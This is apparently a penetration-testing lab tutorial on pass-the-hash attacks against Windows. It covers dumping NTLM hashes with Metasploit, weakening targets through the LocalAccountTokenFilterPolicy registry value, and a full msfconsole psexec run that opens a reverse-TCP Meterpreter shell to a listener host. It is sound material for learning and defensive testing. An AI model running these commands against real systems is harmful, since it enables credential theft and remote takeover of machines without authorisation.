Sometimes a password will be too long or complex to crack. In that case, you can instead try to pass the hash. In this type of attack, when you authenticate to the target operating system or application, you supply the user name and the hash of the password rather than the password itself; it works because NTLM authentication uses the hash, not the plaintext, as the shared secret. You obtain hashes by having the compromised operating system or application dump them from memory (the LSASS process), from the Windows Registry (the SAM and SECURITY hives), or from a credentials file. Metasploit has many hashdump-related modules you can use against Linux, Windows, applications, and other platforms. Most of them are post modules you run after you have compromised the target and obtained a Meterpreter prompt. Here are a few for collecting hashes:

Dumping hashes

Note: To obtain a complete list of hashdump-related Metasploit tools, conduct a search at the Metasploit console, such as search hash platform:windows.

Once you have the hashes, there are several tools you can use to check whether they are still valid, pass them to a target, or attempt to crack them, including:

  • Metasploit modules exploit/windows/smb/psexec and auxiliary/scanner/smb/smb_login
  • Hydra
  • Medusa
  • Veil-Catapult
Pass the hash attack

Passing the hash does not work in every case. Windows Defender Credential Guard, for example, isolates the secrets that LSASS holds for logged-on domain users in a virtualization-based enclave, so their NT hashes cannot be dumped from memory in the first place; if it is enabled on the machine you compromised, you will not get usable domain hashes from it unless Credential Guard is turned off, which itself requires administrative access and a reboot. Credential Guard is not the same thing as Windows Defender Antivirus, which is a separate obstacle: the antivirus is what will usually flag the psexec payload. Even with a hash in hand, you may have to change a Registry setting on the target. Since Windows Vista, User Account Control (UAC) remote restrictions strip the administrative token from local accounts that authenticate over the network, so a local administrator other than the built-in Administrator account cannot run privileged tasks remotely, and psexec fails with an access-denied error. If you want to pass the hash of another local admin, you can disable the restriction by navigating in the Registry to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System and creating a DWORD value named LocalAccountTokenFilterPolicy with a value of 1. Domain accounts are not affected by this filter.

Note: For information about disabling Windows Defender Credential Guard, see

Note: For an interesting article on disabling the LocalAccountTokenFilterPolicy, see


Let's use a Pass-The-Hash attack to gain shell access to the DATABASE computer without needing to brute force the password plaintext. This is a "feature" of NTLM authentication rather than of any one Windows version: as long as the target accepts NTLM, the NT hash itself is the secret that proves identity, so any Windows that still allows NTLM logons is exposed.

msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set RHOSTS <IP of the DATABASE host>
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass <LM hash>:<NT hash>
msf6 exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set LHOST <IP of Security-Desk>
msf6 exploit(windows/smb/psexec) > set LPORT 4445
msf6 exploit(windows/smb/psexec) > exploit -j
msf6 exploit(windows/smb/psexec) > sessions

Notes on the options: SMBPass takes the hash exactly as hashdump prints it, the 32 hex characters of the LM hash, a colon, and the 32 hex characters of the NT hash; when no LM hash is stored, the first half is the empty LM hash aad3b435b51404eeaad3b435b51404ee. RHOSTS is the module's target option (RHOST is accepted as an alias). LPORT is set to 4445 because 4444 is already in use by the Meterpreter listener on the Domain Controller. exploit -j runs the module as a background job, and sessions lists the new Meterpreter session once the service has been pushed and started.